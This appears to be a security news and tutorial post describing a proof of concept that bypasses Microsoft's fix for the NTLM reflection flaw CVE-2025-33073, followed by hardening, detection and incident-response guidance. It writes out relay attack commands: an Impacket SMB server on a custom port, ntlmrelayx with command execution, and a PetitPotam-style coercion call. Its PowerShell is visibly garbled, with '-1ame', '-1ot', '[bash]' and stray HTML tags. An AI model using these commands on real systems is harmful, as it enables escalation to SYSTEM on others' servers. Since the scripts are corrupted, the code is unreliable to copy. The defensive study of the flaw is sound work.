NTLM Reflection Bypass PoC Unleashed: How Attackers Are Gaining SYSTEM Access on Windows Server 2025 + Video

Listen to this Post

Featured Image

Introduction

A critical proof-of-concept (PoC) has been published that bypasses Microsoft’s mitigation for the NTLM reflection vulnerability tracked as CVE-2025-33073, enabling attackers to escalate privileges to NT AUTHORITY\SYSTEM on Windows Server. The exploit exposes fundamental weaknesses in how Windows handles SMB authentication across multiple protocols, leaving a structural attack surface that Microsoft’s original patch failed to address. This vulnerability represents a significant threat to enterprise Windows environments, as it can be chained with other techniques to achieve remote code execution on vulnerable servers without user interaction.

Learning Objectives

  • Understand the technical mechanics behind CVE-2025-33073 and how attackers bypass NTLM reflection mitigations.
  • Learn to identify vulnerable Windows Server and Windows 11 configurations through practical assessment techniques.
  • Master defensive strategies including SMB signing enforcement, channel binding, and service hardening to mitigate the attack vector.

You Should Know

1. Understanding the NTLM Reflection Bypass Mechanism

The vulnerability stems from two conceptual weaknesses left unaddressed by Microsoft’s original patch. CVE-2025-33073 originally allowed attackers who could control DNS records or influence target names to append base64-encoded “additional target information” after a machine name. LSASS strips this extra data before constructing NTLM access or Kerberos blobs, causing the client to authenticate as though to the machine itself. An attacker-controlled server receiving that authentication can relay the resulting NTLM or Kerberos material back to the target, creating an authenticated SMB session as the SYSTEM account.

Microsoft’s fix blocked targets containing additional target information at the SMB client (mrxsmb.sys) but left other client protocols and SMB-specific features untouched. According to Synacktiv, the published PoC exploits a Windows 11/Windows Server feature that lets clients specify an arbitrary TCP port when connecting to SMB shares.

Step-by-step breakdown of the attack chain:

  1. Stage 1 – Establish a persistent TCP connection: The attacker sets up a local SMB server listening on a nonstandard port and mounts a share from that server from the target machine. This establishes a persistent TCP connection that the Windows SMB client will reuse (SMB multiplexing).

  2. Stage 2 – Force privileged authentication: The attacker forces a privileged service (LSASS or another SYSTEM process) to access the same UNC path so the client reuses the previously opened TCP connection.

  3. Stage 3 – Capture and relay credentials: When the privileged service authenticates, its NTLM credentials are captured and relayed back to the machine’s real SMB service, yielding an authenticated session as SYSTEM and enabling command execution.

Key tools used in the PoC chain:

  • Impacket-based SMB server (smbserver.py) capable of running on a custom port and parsing authentication blobs
  • ntlmrelayx to relay NTLM to the local SMB target
  • net.exe to mount the custom-port share
  • A local forcing primitive (modified PetitPotam)

2. Exploitation Tools and Commands

The following commands and tools are commonly used in testing environments to demonstrate the vulnerability. These should only be used in authorized penetration testing scenarios.

Setting up an Impacket SMB server on a custom port (Linux):

 Install Impacket
pip3 install impacket

Start an SMB server on port 8445
python3 smbserver.py -port 8445 share /path/to/share

For verbose logging of authentication attempts
python3 smbserver.py -port 8445 -smb2support share /path/to/share

Relaying NTLM authentication with ntlmrelayx:

 Relay NTLM to local SMB target
ntlmrelayx.py -t smb://127.0.0.1 -smb2support

With specific target and command execution
ntlmrelayx.py -t smb://target_ip -c "whoami" -smb2support

Mounting a custom-port SMB share from Windows (Command Prompt):

net use \127.0.0.1@8445\share

Forcing authentication using modified PetitPotam (PowerShell):

 Example forcing LSASS to authenticate
Invoke-PetitPotam -Target 127.0.0.1 -PipeName lsarpc

Checking SMB signing status on Windows (PowerShell):

Get-SmbServerConfiguration | Select-Object EnableSMB1Protocol, EnableSMB2Protocol, RequireSecuritySignature
Get-SmbClientConfiguration | Select-Object RequireSecuritySignature, EnableSecuritySignature

Enforcing SMB signing via Group Policy or Registry:

 Registry method for SMB client
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" -1ame "RequireSecuritySignature" -Value 1 -Type DWord
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" -1ame "EnableSecuritySignature" -Value 1 -Type DWord

Registry method for SMB server
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -1ame "RequireSecuritySignature" -Value 1 -Type DWord
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -1ame "EnableSecuritySignature" -Value 1 -Type DWord

3. Attack Surface and Vulnerable Configurations

The technique notably does not require user interaction and works against default configurations of Windows Server 2025. Windows 11 24H2 is less affected where SMB signing is enforced by default. This creates a significant risk for organizations running Windows Server environments without additional hardening.

Identifying vulnerable systems:

1. Check for SMB signing enforcement:

  • Systems where SMB signing is not required are vulnerable to NTLM relay attacks.
  • Default Windows Server installations often have SMB signing disabled or set to “negotiated” rather than “required.”

2. Check for WebClient/WebDAV services:

  • The WebClient service can be abused for authentication coercion.
  • Run `sc query WebClient` to check if the service is running.

3. Assess DNS control exposure:

  • Attackers who can control DNS records in Active Directory environments can influence target names for the initial attack stage.

4. Evaluate SMB port accessibility:

  • Any system allowing SMB connections from untrusted networks is at heightened risk.

Automated assessment script (PowerShell):

function Test-1TLMVulnerability {
Write-Host "=== NTLM Reflection Vulnerability Assessment ===" -ForegroundColor Cyan

Check SMB signing
$clientConfig = Get-SmbClientConfiguration
$serverConfig = Get-SmbServerConfiguration

Write-Host "`n[+] SMB Client Signing Required: $($clientConfig.RequireSecuritySignature)"
Write-Host "[+] SMB Server Signing Required: $($serverConfig.RequireSecuritySignature)"

if (-1ot $clientConfig.RequireSecuritySignature -or -1ot $serverConfig.RequireSecuritySignature) {
Write-Host "[!] WARNING: SMB signing is not enforced on one or both sides." -ForegroundColor Yellow
}

Check WebClient service
$webClient = Get-Service -1ame WebClient -ErrorAction SilentlyContinue
if ($webClient -and $webClient.Status -eq 'Running') {
Write-Host "[!] WARNING: WebClient service is running - can be abused for coercion." -ForegroundColor Yellow
}

Check for SMB over custom ports
Write-Host "[+] Checking for SMB services on non-standard ports..."
$ports = @(445, 139, 8445, 9000, 9999)
foreach ($port in $ports) {
$connection = Test-1etConnection -ComputerName localhost -Port $port -WarningAction SilentlyContinue
if ($connection.TcpTestSucceeded) {
Write-Host " SMB service detected on port $port" -ForegroundColor Green
}
}
}

4. Defensive Measures and Mitigation Strategies

Organizations must implement comprehensive defenses beyond the original Microsoft patch.

Immediate hardening actions:

1. Enforce SMB signing and channel binding:

  • Require SMB signing on both client and server sides.
  • Enable channel binding to prevent relay attacks.

2. Disable WebClient/WebDAV where unnecessary:

  • Stop and disable the WebClient service on all systems where it is not required.
  • Command: `sc config WebClient start= disabled && sc stop WebClient`

3. Restrict DNS record creation in Active Directory:

  • Limit which users and groups can create DNS records.
  • Enable secure DNS updates only.
  1. Apply strict outbound connection controls for privileged services:

– Use Windows Firewall to restrict outbound connections from SYSTEM and LSASS processes.
– Implement application whitelisting for SMB outbound connections.

5. Network segmentation:

  • Isolate sensitive servers from untrusted network segments.
  • Use VLANs and firewall rules to limit SMB traffic.

Group Policy recommendations:

Computer Configuration → Policies → Windows Settings → Security Settings → Local Policies → Security Options
- Microsoft network client: Digitally sign communications (always): Enabled
- Microsoft network server: Digitally sign communications (always): Enabled
- Network security: LAN Manager authentication level: Send NTLMv2 response only

Registry hardening script:

 Comprehensive NTLM hardening
$regPaths = @{
"HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" = @{
"RequireSecuritySignature" = 1
"EnableSecuritySignature" = 1
}
"HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" = @{
"RequireSecuritySignature" = 1
"EnableSecuritySignature" = 1
}
"HKLM:\SYSTEM\CurrentControlSet\Control\LSA" = @{
"lmcompatibilitylevel" = 5
"RestrictSendingNTLMTraffic" = 2
}
}

foreach ($path in $regPaths.Keys) {
if (-1ot (Test-Path $path)) { New-Item -Path $path -Force }
foreach ($key in $regPaths[$path].Keys) {
Set-ItemProperty -Path $path -1ame $key -Value $regPaths[$path][$key] -Type DWord -Force
}
}

Disable WebClient
sc config WebClient start= disabled
sc stop WebClient

5. Detection and Monitoring

Organizations should implement monitoring to detect NTLM reflection and relay attempts.

Event log monitoring:

| Event ID | Description | Suspicious Indicators |

|-|-|-|

| 4624 | Successful logon | Unusual logon patterns, especially from SYSTEM to itself |
| 4776 | NTLM authentication | Multiple authentications from same source in short time |
| 5140 | SMB share access | Access to shares from unexpected sources |
| 5145 | SMB detailed share access | Repeated access patterns suggesting relay attempts |

Detection script (PowerShell):

function Find-1TLMRelayIndicators {
param(
[bash]$Hours = 24
)

$startTime = (Get-Date).AddHours(-$Hours)

Look for suspicious NTLM authentications
$events = Get-WinEvent -FilterHashtable @{
LogName = 'Security'
ID = 4776
StartTime = $startTime
} -ErrorAction SilentlyContinue

$suspicious = $events | Group-Object { $<em>.Properties[bash].Value } | 
Where-Object { $</em>.Count -gt 10 } | 
Select-Object Name, Count

if ($suspicious) {
Write-Host "[!] Multiple NTLM authentications detected from same source:" -ForegroundColor Red
$suspicious | Format-Table
}

Check for SMB signing failures
$signingEvents = Get-WinEvent -FilterHashtable @{
LogName = 'Microsoft-Windows-SmbClient/Security'
ID = 1001, 1002
StartTime = $startTime
} -ErrorAction SilentlyContinue

if ($signingEvents) {
Write-Host "[!] SMB signing failures detected - possible relay attempts:" -ForegroundColor Yellow
$signingEvents | Select-Object TimeCreated, Message
}
}

Network-level detection:

  • Monitor for SMB traffic on non-standard ports.
  • Detect SMB connections originating from unexpected processes (especially LSASS).
  • Look for authentication patterns where NTLM credentials are sent to multiple targets in quick succession.

6. Incident Response Considerations

If an NTLM reflection attack is suspected, organizations should follow these response procedures:

1. Immediate containment:

  • Isolate affected systems from the network.
  • Disable SMB services on affected servers if possible.
  • Revoke compromised credentials.

2. Forensic investigation:

  • Collect Security event logs from affected systems.
  • Analyze SMB audit logs for anomalous connections.
  • Review DNS records for unauthorized changes.

3. Remediation:

  • Apply the latest Microsoft security updates.
  • Implement SMB signing enforcement.
  • Review and restrict outbound connections from privileged services.

4. Post-incident hardening:

  • Conduct a full vulnerability assessment.
  • Implement network segmentation.
  • Deploy additional monitoring for NTLM authentication patterns.

What Undercode Say

  • Structural patch failures are a recurring theme: Microsoft’s mitigation for CVE-2025-33073 was limited to the SMB client path (mrxsmb.sys) without addressing how other protocols force authentication or how SMB multiplexing and custom-port features can be abused. This is a textbook example of how narrow patches create new attack vectors.

  • Convenience features are attack enablers: The arbitrary SMB port feature and default connection reuse were designed for convenience but have become critical enablers for reflection and relay attacks when combined with service-forcing primitives. Organizations must evaluate the security implications of every “convenience” feature before enabling it.

The vulnerability highlights a fundamental tension in Windows authentication design. NTLM, despite being deprecated in favor of Kerberos, remains deeply embedded in Windows infrastructure. The attack chain demonstrates that even when a specific vulnerability is patched, the underlying architectural weaknesses—such as the ability to coerce privileged services into authenticating over attacker-controlled connections—persist. Organizations should treat this as a wake-up call to accelerate their migration away from NTLM authentication and toward more secure protocols.

Prediction

  • -1 The discovery of this PoC will likely lead to a surge in exploitation attempts against unpatched Windows Server environments, particularly in organizations that have not enforced SMB signing. Security teams should expect active scanning for vulnerable systems within weeks.

  • -1 Microsoft will face increasing pressure to release a comprehensive patch that addresses the underlying architectural issues, not just the specific SMB client path. However, given the complexity of Windows authentication, a complete fix may take months or even years to implement properly.

  • +1 The public disclosure of this vulnerability will accelerate enterprise adoption of SMB signing and channel binding, ultimately improving the overall security posture of Windows environments despite the short-term risk.

  • +1 Security researchers and vendors will develop more sophisticated detection mechanisms for NTLM reflection attacks, leading to improved defensive tools and monitoring capabilities for the broader security community.

▶️ Related Video (78% Match):

https://www.youtube.com/watch?v=18rSLERRtRQ

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: Mayura Kathiresh – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky